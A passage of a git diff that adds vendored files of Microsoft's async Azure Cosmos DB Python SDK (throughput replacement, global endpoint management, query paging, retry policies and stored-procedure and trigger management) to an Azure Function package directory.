ThroughputProperties for database " + self.database_link) + + if response_hook: + response_hook(self.client_connection.last_response_headers, throughput_properties) + + return ThroughputProperties(offer_throughput=throughput_properties[0]["content"]["offerThroughput"], + properties=throughput_properties[0]) + + + @distributed_trace_async + async def replace_throughput(self, throughput: int, **kwargs: Any) -> ThroughputProperties: + """Replace the database-level throughput. + + If no ThroughputProperties already exist for the database, an exception is raised. + + :param int throughput: The throughput to be set (an integer). + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: No throughput properties exist for the database + or the throughput properties could not be updated. + :returns: ThroughputProperties for the database, updated with new throughput. + :rtype: ~azure.cosmos.offer.ThroughputProperties + """ + response_hook = kwargs.pop('response_hook', None) + properties = await self._get_properties() + link = properties["_self"] + query_spec = { + "query": "SELECT * FROM root r WHERE r.resource=@link", + "parameters": [{"name": "@link", "value": link}], + } + throughput_properties = [throughput async for throughput in + self.client_connection.QueryOffers(query_spec, **kwargs)] + if len(throughput_properties) == 0: + raise CosmosResourceNotFoundError( + status_code=StatusCodes.NOT_FOUND, + message="Could not find Offer for database " + self.database_link) + + new_offer = throughput_properties[0].copy() + new_offer["content"]["offerThroughput"] = throughput + data = await self.client_connection.ReplaceOffer(offer_link=throughput_properties[0]["_self"], + offer=throughput_properties[0], **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers, data) + return ThroughputProperties(offer_throughput=data["content"]["offerThroughput"], properties=data) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_global_endpoint_manager_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_global_endpoint_manager_async.py new file mode 100644 index 0000000..6ee4b25 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_global_endpoint_manager_async.py @@ -0,0 +1,168 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for global endpoint manager implementation in the Azure Cosmos +database service. +""" + +import asyncio +from urllib.parse import urlparse +from .. import _constants as constants +from .. import exceptions +from .._location_cache import LocationCache + +# pylint: disable=protected-access + +class _GlobalEndpointManager(object): + """ + This internal class implements the logic for endpoint management for + geo-replicated database accounts. + """ + + def __init__(self, client): + self.client = client + self.EnableEndpointDiscovery = client.connection_policy.EnableEndpointDiscovery + self.PreferredLocations = client.connection_policy.PreferredLocations + self.DefaultEndpoint = client.url_connection + self.refresh_time_interval_in_ms = self.get_refresh_time_interval_in_ms_stub() + self.location_cache = LocationCache( + self.PreferredLocations, + self.DefaultEndpoint, + self.EnableEndpointDiscovery, + client.connection_policy.UseMultipleWriteLocations, + self.refresh_time_interval_in_ms, + ) + self.refresh_needed = False + self.refresh_lock = asyncio.Lock() + self.last_refresh_time = 0 + + def get_refresh_time_interval_in_ms_stub(self): # pylint: disable=no-self-use + return constants._Constants.DefaultUnavailableLocationExpirationTime + + def get_write_endpoint(self): + return self.location_cache.get_write_endpoint() + + def get_read_endpoint(self): + return self.location_cache.get_read_endpoint() + + def resolve_service_endpoint(self, request): + return self.location_cache.resolve_service_endpoint(request) + + def mark_endpoint_unavailable_for_read(self, endpoint): + self.location_cache.mark_endpoint_unavailable_for_read(endpoint) + + def mark_endpoint_unavailable_for_write(self, endpoint): + self.location_cache.mark_endpoint_unavailable_for_write(endpoint) + + def get_ordered_write_endpoints(self): + return self.location_cache.get_ordered_write_endpoints() + + def can_use_multiple_write_locations(self, request): + return self.location_cache.can_use_multiple_write_locations_for_request(request) + + async def force_refresh(self, database_account): + self.refresh_needed = True + await self.refresh_endpoint_list(database_account) + + async def refresh_endpoint_list(self, database_account, **kwargs): + async with self.refresh_lock: + # if refresh is not needed or refresh is already taking place, return + if not self.refresh_needed: + return + try: + await self._refresh_endpoint_list_private(database_account, **kwargs) + except Exception as e: + raise e + + async def _refresh_endpoint_list_private(self, database_account=None, **kwargs): + if database_account: + self.location_cache.perform_on_database_account_read(database_account) + self.refresh_needed = False + + if ( + self.location_cache.should_refresh_endpoints() + and self.location_cache.current_time_millis() - self.last_refresh_time > self.refresh_time_interval_in_ms + ): + if not database_account: + database_account = await self._GetDatabaseAccount(**kwargs) + self.location_cache.perform_on_database_account_read(database_account) + self.last_refresh_time = self.location_cache.current_time_millis() + self.refresh_needed = False + + async def _GetDatabaseAccount(self, **kwargs): + """Gets the database account. + + First tries by using the default endpoint, and if that doesn't work, + use the endpoints for the preferred locations in the order they are + specified, to get the database account. + """ + try: + database_account = await self._GetDatabaseAccountStub(self.DefaultEndpoint, **kwargs) + return database_account + # If for any reason(non-globaldb related), we are not able to get the database + # account from the above call to GetDatabaseAccount, we would try to get this + # information from any of the preferred locations that the user might have + # specified (by creating a locational endpoint) and keeping eating the exception + # until we get the database account and return None at the end, if we are not able + # to get that info from any endpoints + except exceptions.CosmosHttpResponseError: + for location_name in self.PreferredLocations: + locational_endpoint = _GlobalEndpointManager.GetLocationalEndpoint(self.DefaultEndpoint, location_name) + try: + database_account = await self._GetDatabaseAccountStub(locational_endpoint, **kwargs) + return database_account + except exceptions.CosmosHttpResponseError: + pass + + return None + + async def _GetDatabaseAccountStub(self, endpoint, **kwargs): + """Stub for getting database account from the client. + + This can be used for mocking purposes as well. + """ + return await self.client.GetDatabaseAccount(endpoint, **kwargs) + + @staticmethod + def GetLocationalEndpoint(default_endpoint, location_name): + # For default_endpoint like 'https://contoso.documents.azure.com:443/' parse it to + # generate URL format. This default_endpoint should be global endpoint(and cannot + # be a locational endpoint) and we agreed to document that + endpoint_url = urlparse(default_endpoint) + + # hostname attribute in endpoint_url will return 'contoso.documents.azure.com' + if endpoint_url.hostname is not None: + hostname_parts = str(endpoint_url.hostname).lower().split(".") + if hostname_parts is not None: + # global_database_account_name will return 'contoso' + global_database_account_name = hostname_parts[0] + + # Prepare the locational_database_account_name as contoso-EastUS for location_name 'East US' + locational_database_account_name = global_database_account_name + "-" + location_name.replace(" ", "") + + # Replace 'contoso' with 'contoso-EastUS' and return locational_endpoint + # as https://contoso-EastUS.documents.azure.com:443/ + locational_endpoint = default_endpoint.lower().replace( + global_database_account_name, locational_database_account_name, 1 + ) + return locational_endpoint + + return None diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_query_iterable_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_query_iterable_async.py new file mode 100644 index 0000000..bac5c44 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_query_iterable_async.py @@ -0,0 +1,105 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Iterable query results in the Azure Cosmos database service. +""" +import asyncio +from azure.core.async_paging import AsyncPageIterator +from azure.cosmos._execution_context.aio import execution_dispatcher + +# pylint: disable=protected-access + + +class QueryIterable(AsyncPageIterator): + """Represents an iterable object of the query results. + + QueryIterable is a wrapper for query execution context. + """ + + def __init__( + self, + client, + query, + options, + fetch_function=None, + collection_link=None, + database_link=None, + partition_key=None, + continuation_token=None, + ): + """Instantiates a QueryIterable for non-client side partitioning queries. + + _ProxyQueryExecutionContext will be used as the internal query execution + context. + + :param CosmosClient client: Instance of document client. + :param (str or dict) query: + :param dict options: The request options for the request. + :param method fetch_function: + :param method resource_type: The type of the resource being queried + :param str resource_link: If this is a Document query/feed collection_link is required. + + Example of `fetch_function`: + + >>> def result_fn(result): + >>> return result['Databases'] + + """ + self._client = client + self.retry_options = client.connection_policy.RetryOptions + self._query = query + self._options = options + if continuation_token: + options['continuation'] = continuation_token + self._fetch_function = fetch_function + self._collection_link = collection_link + self._database_link = database_link + self._partition_key = partition_key + self._ex_context = execution_dispatcher._ProxyQueryExecutionContext( + self._client, self._collection_link, self._query, self._options, self._fetch_function + ) + super(QueryIterable, self).__init__(self._fetch_next, self._unpack, continuation_token=continuation_token) + + async def _unpack(self, block): + continuation = None + if self._client.last_response_headers: + continuation = self._client.last_response_headers.get("x-ms-continuation") or \ + self._client.last_response_headers.get('etag') + if block: + self._did_a_call_already = False + return continuation, block + + async def _fetch_next(self, *args): # pylint: disable=unused-argument + """Return a block of results with respecting retry policy. + + This method only exists for backward compatibility reasons. (Because + QueryIterable has exposed fetch_next_block api). + + :return: List of results. + :rtype: list + """ + + if 'partitionKey' in self._options and asyncio.iscoroutine(self._options['partitionKey']): + self._options['partitionKey'] = await self._options['partitionKey'] + block = await self._ex_context.fetch_next_block() + if not block: + raise StopAsyncIteration + return block diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_retry_utility_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_retry_utility_async.py new file mode 100644 index 0000000..90bba2f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_retry_utility_async.py @@ -0,0 +1,201 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal methods for executing functions in the Azure Cosmos database service. +""" + +import time +import asyncio + +from azure.core.exceptions import AzureError, ClientAuthenticationError +from azure.core.pipeline.policies import AsyncRetryPolicy + +from .. import exceptions +from ..http_constants import HttpHeaders, StatusCodes, SubStatusCodes +from .._retry_utility import _configure_timeout +from .. import _endpoint_discovery_retry_policy +from .. import _resource_throttle_retry_policy +from .. import _default_retry_policy +from .. import _session_retry_policy +from .. import _gone_retry_policy + + +# pylint: disable=protected-access + + +async def ExecuteAsync(client, global_endpoint_manager, function, *args, **kwargs): + """Executes the function with passed parameters applying all retry policies + + :param object client: + Document client instance + :param object global_endpoint_manager: + Instance of _GlobalEndpointManager class + :param function function: + Function to be called wrapped with retries + :param (non-keyworded, variable number of arguments list) *args: + :param (keyworded, variable number of arguments list) **kwargs: + + """ + # instantiate all retry policies here to be applied for each request execution + endpointDiscovery_retry_policy = _endpoint_discovery_retry_policy.EndpointDiscoveryRetryPolicy( + client.connection_policy, global_endpoint_manager, *args + ) + + resourceThrottle_retry_policy = _resource_throttle_retry_policy.ResourceThrottleRetryPolicy( + client.connection_policy.RetryOptions.MaxRetryAttemptCount, + client.connection_policy.RetryOptions.FixedRetryIntervalInMilliseconds, + client.connection_policy.RetryOptions.MaxWaitTimeInSeconds, + ) + defaultRetry_policy = _default_retry_policy.DefaultRetryPolicy(*args) + + sessionRetry_policy = _session_retry_policy._SessionRetryPolicy( + client.connection_policy.EnableEndpointDiscovery, global_endpoint_manager, *args + ) + partition_key_range_gone_retry_policy = _gone_retry_policy.PartitionKeyRangeGoneRetryPolicy(client, *args) + + while True: + try: + client_timeout = kwargs.get('timeout') + start_time = time.time() + if args: + result = await ExecuteFunctionAsync(function, global_endpoint_manager, *args, **kwargs) + else: + result = await ExecuteFunctionAsync(function, *args, **kwargs) + if not client.last_response_headers: + client.last_response_headers = {} + + # setting the throttle related response headers before returning the result + client.last_response_headers[ + HttpHeaders.ThrottleRetryCount + ] = resourceThrottle_retry_policy.current_retry_attempt_count + client.last_response_headers[ + HttpHeaders.ThrottleRetryWaitTimeInMs + ] = resourceThrottle_retry_policy.cummulative_wait_time_in_milliseconds + + return result + except exceptions.CosmosHttpResponseError as e: + retry_policy = None + if e.status_code == StatusCodes.FORBIDDEN and e.sub_status == SubStatusCodes.WRITE_FORBIDDEN: + retry_policy = endpointDiscovery_retry_policy + elif e.status_code == StatusCodes.TOO_MANY_REQUESTS: + retry_policy = resourceThrottle_retry_policy + elif ( + e.status_code == StatusCodes.NOT_FOUND + and e.sub_status + and e.sub_status == SubStatusCodes.READ_SESSION_NOTAVAILABLE + ): + retry_policy = sessionRetry_policy + elif exceptions._partition_range_is_gone(e): + retry_policy = partition_key_range_gone_retry_policy + else: + retry_policy = defaultRetry_policy + + # If none of the retry policies applies or there is no retry needed, set the + # throttle related response headers and re-throw the exception back arg[0] + # is the request. It needs to be modified for write forbidden exception + if not retry_policy.ShouldRetry(e): + if not client.last_response_headers: + client.last_response_headers = {} + client.last_response_headers[ + HttpHeaders.ThrottleRetryCount + ] = resourceThrottle_retry_policy.current_retry_attempt_count + client.last_response_headers[ + HttpHeaders.ThrottleRetryWaitTimeInMs + ] = resourceThrottle_retry_policy.cummulative_wait_time_in_milliseconds + if args and args[0].should_clear_session_token_on_session_read_failure: + client.session.clear_session_token(client.last_response_headers) + raise + + # Wait for retry_after_in_milliseconds time before the next retry + await asyncio.sleep(retry_policy.retry_after_in_milliseconds / 1000.0) + if client_timeout: + kwargs['timeout'] = client_timeout - (time.time() - start_time) + if kwargs['timeout'] <= 0: + raise exceptions.CosmosClientTimeoutError() + + +async def ExecuteFunctionAsync(function, *args, **kwargs): + """Stub method so that it can be used for mocking purposes as well. + """ + return await function(*args, **kwargs) + + +class _ConnectionRetryPolicy(AsyncRetryPolicy): + + def __init__(self, **kwargs): + clean_kwargs = {k: v for k, v in kwargs.items() if v is not None} + super(_ConnectionRetryPolicy, self).__init__(**clean_kwargs) + + async def send(self, request): + """Sends the PipelineRequest object to the next policy. Uses retry settings if necessary. + Also enforces an absolute client-side timeout that spans multiple retry attempts. + + :param request: The PipelineRequest object + :type request: ~azure.core.pipeline.PipelineRequest + :return: Returns the PipelineResponse or raises error if maximum retries exceeded. + :rtype: ~azure.core.pipeline.PipelineResponse + :raises ~azure.core.exceptions.AzureError: Maximum retries exceeded. + :raises ~azure.cosmos.exceptions.CosmosClientTimeoutError: Specified timeout exceeded. + :raises ~azure.core.exceptions.ClientAuthenticationError: Authentication failed. + """ + absolute_timeout = request.context.options.pop('timeout', None) + per_request_timeout = request.context.options.pop('connection_timeout', 0) + + retry_error = None + retry_active = True + response = None + retry_settings = self.configure_retries(request.context.options) + while retry_active: + try: + start_time = time.time() + _configure_timeout(request, absolute_timeout, per_request_timeout) + + response = await self.next.send(request) + if self.is_retry(retry_settings, response): + retry_active = self.increment(retry_settings, response=response) + if retry_active: + await self.sleep(retry_settings, request.context.transport, response=response) + continue + break + except ClientAuthenticationError: # pylint:disable=try-except-raise + # the authentication policy failed such that the client's request can't + # succeed--we'll never have a response to it, so propagate the exception + raise + except exceptions.CosmosClientTimeoutError as timeout_error: + timeout_error.inner_exception = retry_error + timeout_error.response = response + timeout_error.history = retry_settings['history'] + raise + except AzureError as err: + retry_error = err + if self._is_method_retryable(retry_settings, request.http_request): + retry_active = self.increment(retry_settings, response=request, error=err) + if retry_active: + await self.sleep(retry_settings, request.context.transport) + continue + raise err + finally: + end_time = time.time() + if absolute_timeout: + absolute_timeout -= (end_time - start_time) + + self.update_context(response.context, retry_settings) + return response diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_scripts.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_scripts.py new file mode 100644 index 0000000..cbc648f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_scripts.py @@ -0,0 +1,490 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Create, read, update and delete and execute scripts in the Azure Cosmos DB SQL API service. +""" + +from typing import Any, Dict, Union +from azure.core.async_paging import AsyncItemPaged + +from azure.core.tracing.decorator_async import distributed_trace_async +from azure.core.tracing.decorator import distributed_trace + +from ._cosmos_client_connection_async import CosmosClientConnection as _CosmosClientConnection +from .._base import build_options as _build_options +from ..partition_key import NonePartitionKeyValue + +# pylint: disable=protected-access +# pylint: disable=missing-client-constructor-parameter-credential,missing-client-constructor-parameter-kwargs + + +class ScriptType(object): + StoredProcedure = "sprocs" + Trigger = "triggers" + UserDefinedFunction = "udfs" + + +class ScriptsProxy(object): + """An interface to interact with stored procedures. + + This class should not be instantiated directly. Instead, use the + :func:`ContainerProxy.scripts` attribute. + """ + + def __init__( + self, + container: "ContainerProxy", + client_connection: _CosmosClientConnection, + container_link: str + ) -> None: + self.client_connection = client_connection + self.container_link = container_link + self.container_proxy = container + + def _get_resource_link(self, script_or_id: Union[Dict[str, Any], str], typ: str) -> str: + if isinstance(script_or_id, str): + return u"{}/{}/{}".format(self.container_link, typ, script_or_id) + return script_or_id["_self"] + + @distributed_trace + def list_stored_procedures( + self, + **kwargs: Any + ) -> AsyncItemPaged[Dict[str, Any]]: + """List all stored procedures in the container. + + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :returns: An AsyncItemPaged of stored procedures (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = _build_options(kwargs) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + return self.client_connection.ReadStoredProcedures( + collection_link=self.container_link, options=feed_options, **kwargs + ) + + @distributed_trace + def query_stored_procedures( + self, + query: Union[str, Dict[str, Any]], + **kwargs: Any + ) -> AsyncItemPaged[Dict[str, Any]]: + """Return all stored procedures matching the given `query`. + + :param Union[str, Dict[str, Any]] query: The Azure Cosmos DB SQL query to execute. + :keyword parameters: Optional array of parameters to the query. Ignored if no query is provided. + :paramtype parameters: List[Dict[str, Any]] + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :returns: An AsyncItemPaged of stored procedures (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = _build_options(kwargs) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + parameters = kwargs.pop('parameters', None) + return self.client_connection.QueryStoredProcedures( + collection_link=self.container_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + **kwargs + ) + + @distributed_trace_async + async def get_stored_procedure(self, sproc: Union[str, Dict[str, Any]], **kwargs: Any) -> Dict[str, Any]: + """Get the stored procedure identified by `sproc`. + + :param sproc: The ID (name) or dict representing the stored procedure to retrieve. + :type sproc: Union[str, Dict[str, Any]] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given stored procedure couldn't be retrieved. + :returns: A dict representing the retrieved stored procedure. + :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + + return await self.client_connection.ReadStoredProcedure( + sproc_link=self._get_resource_link(sproc, ScriptType.StoredProcedure), options=request_options, **kwargs + ) + + @distributed_trace_async + async def create_stored_procedure(self, body: Dict[str, Any], **kwargs: Any) -> Dict[str, Any]: + """Create a new stored procedure in the container. + + To replace an existing stored procedure, use the :func:`Container.scripts.replace_stored_procedure` method. + + :param Dict[str, Any] body: A dict-like object representing the stored procedure to create. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given stored procedure couldn't be created. + :returns: A dict representing the new stored procedure. + :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + + return await self.client_connection.CreateStoredProcedure( + collection_link=self.container_link, sproc=body, options=request_options, **kwargs + ) + + @distributed_trace_async + async def replace_stored_procedure( + self, + sproc: Union[str, Dict[str, Any]], + body: Dict[str, Any], + **kwargs: Any + ) -> Dict[str, Any]: + """Replace a specified stored procedure in the container. + + If the stored procedure does not already exist in the container, an exception is raised. + + :param sproc: The ID (name) or dict representing stored procedure to be replaced. + :type sproc: Union[str, Dict[str, Any]] + :param Dict[str, Any] body: A dict-like object representing the stored procedure to replace. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the replace failed or the stored + procedure with given id does not exist. + :returns: A dict representing the stored procedure after replace went through. + :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + + return await self.client_connection.ReplaceStoredProcedure( + sproc_link=self._get_resource_link(sproc, ScriptType.StoredProcedure), + sproc=body, + options=request_options, + **kwargs + ) + + @distributed_trace_async + async def delete_stored_procedure(self, sproc: Union[str, Dict[str, Any]], **kwargs: Any) -> None: + """Delete a specified stored procedure from the container. + + If the stored procedure does not already exist in the container, an exception is raised. + + :param sproc: The ID (name) or dict representing stored procedure to be deleted. + :type sproc: Union[str, Dict[str, Any]] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The stored procedure wasn't deleted successfully. + :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The stored procedure does not exist in + the container. + :rtype: None + """ + request_options = _build_options(kwargs) + + await self.client_connection.DeleteStoredProcedure( + sproc_link=self._get_resource_link(sproc, ScriptType.StoredProcedure), options=request_options, **kwargs + ) + + @distributed_trace_async + async def execute_stored_procedure( + self, + sproc: Union[str, Dict[str, Any]], + **kwargs: Any + ) -> Dict[str, Any]: + """Execute a specified stored procedure. + + If the stored procedure does not already exist in the container, an exception is raised. + + :param sproc: The ID (name) or dict representing the stored procedure to be executed. + :type sproc: Union[str, Dict[str, Any]] + :keyword partition_key: Specifies the partition key to indicate which partition the stored procedure should + execute on. + :paramtype partition_key: Union[str, int, float, bool] + :keyword parameters: List of parameters to be passed to the stored procedure to be executed. + :paramtype parameters: List[Dict[str, Any]] + :keyword bool enable_script_logging: Enables or disables script logging for the current request. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the stored procedure execution failed + or if the stored procedure with given id does not exists in the container. + :returns: Result of the executed stored procedure for the given parameters. + :rtype: Dict[str, Any] + """ + + request_options = _build_options(kwargs) + partition_key = kwargs.pop("partition_key", None) + if partition_key is not None: + request_options["partitionKey"] = ( + _CosmosClientConnection._return_undefined_or_empty_partition_key( + await self.container_proxy.is_system_key) + if partition_key == NonePartitionKeyValue + else partition_key + ) + enable_script_logging = kwargs.pop('enable_script_logging', None) + if enable_script_logging is not None: + request_options["enableScriptLogging"] = enable_script_logging + + parameters = kwargs.pop("parameters", None) + return await self.client_connection.ExecuteStoredProcedure( + sproc_link=self._get_resource_link(sproc, ScriptType.StoredProcedure), + params=parameters, + options=request_options, + **kwargs + ) + + @distributed_trace + def list_triggers(self, **kwargs: Any) -> AsyncItemPaged[Dict[str, Any]]: + """List all triggers in the container. + + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :returns: An AsyncItemPaged of triggers (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = _build_options(kwargs) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + return self.client_connection.ReadTriggers( + collection_link=self.container_link, options=feed_options, **kwargs + ) + + @distributed_trace + def query_triggers( + self, + query: Union[str, Dict[str, Any]], + **kwargs: Any + ) -> AsyncItemPaged[Dict[str, Any]]: + """Return all triggers matching the given `query`. + + :param Union[str, Dict[str, Any]] query: The Azure Cosmos DB SQL query to execute. + :keyword parameters: Optional array of parameters to the query. Ignored if no query is provided. + :paramtype parameters: List[Dict[str, Any]] + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :returns: An AsyncItemPaged of triggers (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = _build_options(kwargs) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + parameters = kwargs.pop('parameters', None) + return self.client_connection.QueryTriggers( + collection_link=self.container_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + **kwargs + ) + + @distributed_trace_async + async def get_trigger(self, trigger: Union[str, Dict[str, Any]], **kwargs: Any) -> Dict[str, Any]: + """Get a trigger identified by `id`. + + :param trigger: The ID (name) or dict representing trigger to retrieve. + :type trigger: Union[str, Dict[str, Any]] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given trigger couldn't be retrieved. + :returns: A dict representing the retrieved trigger. + :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + + return await self.client_connection.ReadTrigger( + trigger_link=self._get_resource_link(trigger, ScriptType.Trigger), options=request_options, **kwargs + ) + + @distributed_trace_async + async def create_trigger(self, body: Dict[str, Any], **kwargs: Any) -> Dict[str, Any]: + """Create a trigger in the container. + + To replace an existing trigger, use the :func:`ContainerProxy.scripts.replace_trigger` method. + + :param Dict[str, Any] body: A dict-like object representing the trigger to create. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given trigger couldn't be created. + :returns: A dict representing the new trigger. + :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + + return await self.client_connection.CreateTrigger( + collection_link=self.container_link, trigger=body, options=request_options, **kwargs + ) + + @distributed_trace_async + async def replace_trigger( + self, + trigger: Union[str, Dict[str, Any]], + body: Dict[str, Any], + **kwargs: Any + ) -> Dict[str, Any]: + """Replace a specified trigger in the container. + + If the trigger does not already exist in the container, an exception is raised. + + :param trigger: The ID (name) or dict representing trigger to be replaced. + :type trigger: Union[str, Dict[str, Any]] + :param Dict[str, Any] body: A dict-like object representing the trigger to replace. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the replace failed or the trigger with given + id does not exist. + :returns: A dict representing the trigger after replace went through. + :rtype: Dict[str, Any] + """ + request_options = _build_options(kwargs) + + return await self.client_connection.ReplaceTrigger( + trigger_link=self._get_resource_link(trigger, ScriptType.Trigger), + trigger=body, + options=request_options, + **kwargs + ) + + @distributed_trace_async + async def delete_trigger(self, trigger: Union[str, Dict[str, Any]], **kwargs: Any) -> None: + """Delete a specified trigger from the container. + + If the trigger does not already exist in the container, an exception is raised. + + :param trigger: The ID (name) or dict representing trigger to be deleted. + :type trigger: Union[str, Dict[str, Any]] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The trigger wasn't deleted successfully. + :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The trigger does not exist in the container. + :rtype: None + """ + request_options = _build_options(kwargs) + + await self.client_connection.DeleteTrigger( + trigger_link=self._get_resource_link(trigger, ScriptType.Trigger), options=request_options, **kwargs + ) + + @distributed_trace + def list_user_defined_functions( + self, + **kwargs: Any + ) -> AsyncItemPaged[Dict[str, Any]]: + """List all the user-defined functions 